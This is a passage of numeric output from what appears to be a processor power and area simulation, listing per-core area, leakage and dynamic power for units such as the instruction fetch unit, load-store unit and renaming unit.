'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0739427,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.70339,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.218692,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.251143,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.15017,
'Instruction Fetch Unit/Runtime Dynamic': 0.566128,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0400528,
'L2/Runtime Dynamic': 0.0106666,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.64147,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.16807,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0777864,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0777863,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.00879,
'Load Store Unit/Runtime Dynamic': 1.62947,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.191808,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.383615,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0680733,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0685959,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.29244,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0360843,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.565486,
'Memory Management Unit/Runtime Dynamic': 0.10468,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.9931,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0830406,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0121977,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.126534,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.221772,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.62458,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0603411,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.250083,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.259349,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.249152,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.401873,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.202852,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.853877,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.245195,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.79785,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0489966,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0104506,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.100866,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0772882,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.149862,
'Execution Unit/Register Files/Runtime Dynamic': 0.0877388,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.227584,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.538882,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.13596,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00172874,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00172874,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00155042,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000624638,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00111025,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00611814,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0149781,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0742991,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.72606,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.226296,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.252353,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.17394,
'Instruction Fetch Unit/Runtime Dynamic': 0.574045,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0211766,
'L2/Runtime Dynamic': 0.00488633,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.43835,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.06337,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0712149,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.071215,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.77464,
'Load Store Unit/Runtime Dynamic': 1.48579,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.175604,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.351208,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0623224,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0625822,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.293849,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0372702,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.557017,
'Memory Management Unit/Runtime Dynamic': 0.0998523,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.9141,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.128888,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0128096,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.125747,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.267444,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.56798,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.190515,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.352327,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.01422,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.299881,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.483697,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.244154,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.02773,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.187482,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.98524,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.191607,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0125783,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.162877,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0930246,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.354484,
'Execution Unit/Register Files/Runtime Dynamic': 0.105603,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.390775,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.788674,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.67971,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000870459,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000870459,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000764647,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00029955,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133631,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00384187,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00811442,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
